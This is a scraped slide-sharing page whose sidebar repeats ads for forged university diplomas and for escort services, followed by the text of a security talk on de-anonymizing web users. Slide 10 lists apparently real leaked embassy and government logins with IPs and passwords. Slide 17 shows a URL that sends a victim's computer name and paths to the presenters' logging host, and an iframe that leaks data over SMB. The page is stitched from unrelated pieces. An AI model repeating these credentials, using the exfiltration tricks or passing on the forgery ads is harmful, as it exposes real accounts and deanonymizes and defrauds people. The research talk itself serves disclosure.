定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一Fs
 
Film cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasaFilm cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasa494f574xmv
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书zdzoqco
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一Fs
 
PHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationPHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationLinaWolf1
 
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书rnrncn29
 
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Sonam Pathan
 
Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Excelmac1
 
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predieusebiomeyer
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作ys8omjxb
 

Recently uploaded (20)

Magic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptxMagic exist by Marta Loveguard - presentation.pptx
Magic exist by Marta Loveguard - presentation.pptx
 
Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24Font Performance - NYC WebPerf Meetup April '24
Font Performance - NYC WebPerf Meetup April '24
 
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
办理(UofR毕业证书)罗切斯特大学毕业证成绩单原版一比一
 
NSX-T and Service Interfaces presentation
NSX-T and Service Interfaces presentationNSX-T and Service Interfaces presentation
NSX-T and Service Interfaces presentation
 
Elevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New OrleansElevate Your Business with Our IT Expertise in New Orleans
Elevate Your Business with Our IT Expertise in New Orleans
 
Top 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxTop 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptx
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
 
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort ServiceHot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
Hot Sexy call girls in Rk Puram 🔝 9953056974 🔝 Delhi escort Service
 
Git and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITMGit and Github workshop GDSC MLRITM
Git and Github workshop GDSC MLRITM
 
Contact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New DelhiContact Rya Baby for Call Girls New Delhi
Contact Rya Baby for Call Girls New Delhi
 
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
定制(Lincoln毕业证书)新西兰林肯大学毕业证成绩单原版一比一
 
Film cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasaFilm cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasa
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
 
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
定制(AUT毕业证书)新西兰奥克兰理工大学毕业证成绩单原版一比一
 
PHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationPHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 Documentation
 
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
 
Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170Call Girls Near The Suryaa Hotel New Delhi 9873777170
Call Girls Near The Suryaa Hotel New Delhi 9873777170
 
Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...Blepharitis inflammation of eyelid symptoms cause everything included along w...
Blepharitis inflammation of eyelid symptoms cause everything included along w...
 
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predi
 
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
Potsdam FH学位证,波茨坦应用技术大学毕业证书1:1制作
 

Unmasking or De-Anonymizing You

  • 1. 1 Your logo here…
  • 2. Robert “RSnake” Hansen -CEO SecTheory LLC http://www.sectheory.com http://ha.ckers.org –the lab http://sla.ckers.org –the forum Joshua “Jabra”Abraham Rapid7 LLC -Security Researcher http://www.rapid7.com http://blog.spl0it.org 2
  • 3. 3 Why does this matter? Privacy advocacy People think they’re safe Privacy is not a guarantee. It can be taken from you. True anonymity is actually extremely difficult to achieve!! So we decided to attack users instead of websites for once.
  • 4. 4 Safety from trolls who want to drop docs Safer for political dissidents Safer for potential victims of violent crimes (women, children)… Allows people to be themselves (for good or bad) Safer for whistle blowers Increases freedoms
  • 5. 5 Haven for “evildoers” Allows them to attack easily Allows them to retreat easily Allows them to exfiltratedata easily Hurts law enforcement Prevents “social compact” rules of order from working in online contexts.
  • 6. 6 The ecosystem is too complex IP is the “gold standard” for tracking people down on the Internet, but what if we could do better? Let’s start with the basics of how people anonymizethemselves.
  • 7. 7 Basic anonymizationguide Proxies: CGI proxies SOCKS Proxies Tor Hacked machines Freemail Hotmail Gmail Hushmail
  • 8. 8 Good/Normal Use Improving the trust model Client: has the cert in the browser Servers: requires all clients have valid certs What if the client goes to another website with SSL? Browser defaults to send the public key
  • 9. Well, could this be malicious? Sniff the public key Information System/OS Usernames/Emails Data correlation Tie a user back to a system 9 https://www.cs.uccs.edu/~cs591/secureWebAccess/fireFoxUserIDReq.png
  • 10. 10 100 embassy passwords Breach proxy honeypots Open Proxies you trust? HackedTor.exe Setup the Client Tor node just logs everything We can play MiTMlike Jay Kazakhstan Embassy in Egypt 213.131.64.229 kazaembpiramid Mongolian Embassy in USA 209.213.221.249 n.tumenbayar@mongolianembassy.us temp UK Visa Application Centre in Nepal 208.109.119.54 vfsuknepal@vfs-uk- np.com Password Defense Research & Development Organization Govt. Of India, Ministry of Defense jpsingh@drdo.com password+1 Indian Embassy in USA amb@indianembassy.org 1234 Iran Embassy in Ghana 217.172.99.19 iranemb_accra@mfa.gov.ir accra Iran Embassy in Kenya 217.172.99.19 iranemb_kenya@mfa.gov.ir kenya Hong Kong Liberal Party 202.123.79.164 miriamlau123456
  • 11. 11 Browsers lie about having a same origin policy (or at least are terrible at enforcing it) Pluginslie worse Websites control browsers, not the other way around in a decloakingscenario -Bill Joy (Sun)
  • 12. 12 MrT Plugins History Screen Resolution BeEF VMware detection (IE only) Plugindetection (Java, Flash and Quicktime) Setup script in Backtrack4 But…. The Cloud is the new Hotness!
  • 13. 13 VM Detection VMware QEMU VirtualBox Amazon EC2 Detection Identify each region Cross-Platform New BeEFModule! Leverage this knowledge in our attacks
  • 14. 14 Java Java internal IP Flash scp:// (winSCP) Word/pdfbugs Media player itms: Already part of decloak.net
  • 15. 15 res:// timing res:// timing without JavaScript smbenum -“Wtf?”
  • 16. 16 SMB enumonly finds certain types of files and only if known prior to testing SMB enumcould also gather usernames through brute force Usernames + res:// timing could gather programs that smbenumalone couldn’t
  • 17. 17 But seriously –that’s just terrible, let’s just get the username and computer name directly! Cut and paste http://ha.ckers.org/log.cgi? rAnd0mcr4p%aPpdAta%2hide%coMpuTeRnaME%th3v4rz SMB <iframesrc="file:///2.2.2.2"> </iframe>
  • 18. 18 Text/Frequency Analysis Header analysis DNS binding and rebinding Etc… etc… Detecting Malice But all that relies on us “trapping” you let’s talk about one more: Log correlation…
  • 19. 19
  • 20. 20
  • 21. 21
  • 22. 22
  • 23. 23
  • 24. 24
  • 25. 25
  • 26. Robert “RSnake” Hansen http://www.sectheory.com http://ha.ckers.org –the lab http://sla.ckers.org –the forum h_aT_ckers_d0t_org Joshua “Jabra” Abraham http://www.rapid7.com http://blog.spl0it.org http://www.spl0it.org/files/talks/defcon09/ Final version of Slides and Demos Jabra_aT_spl0it_d0t_org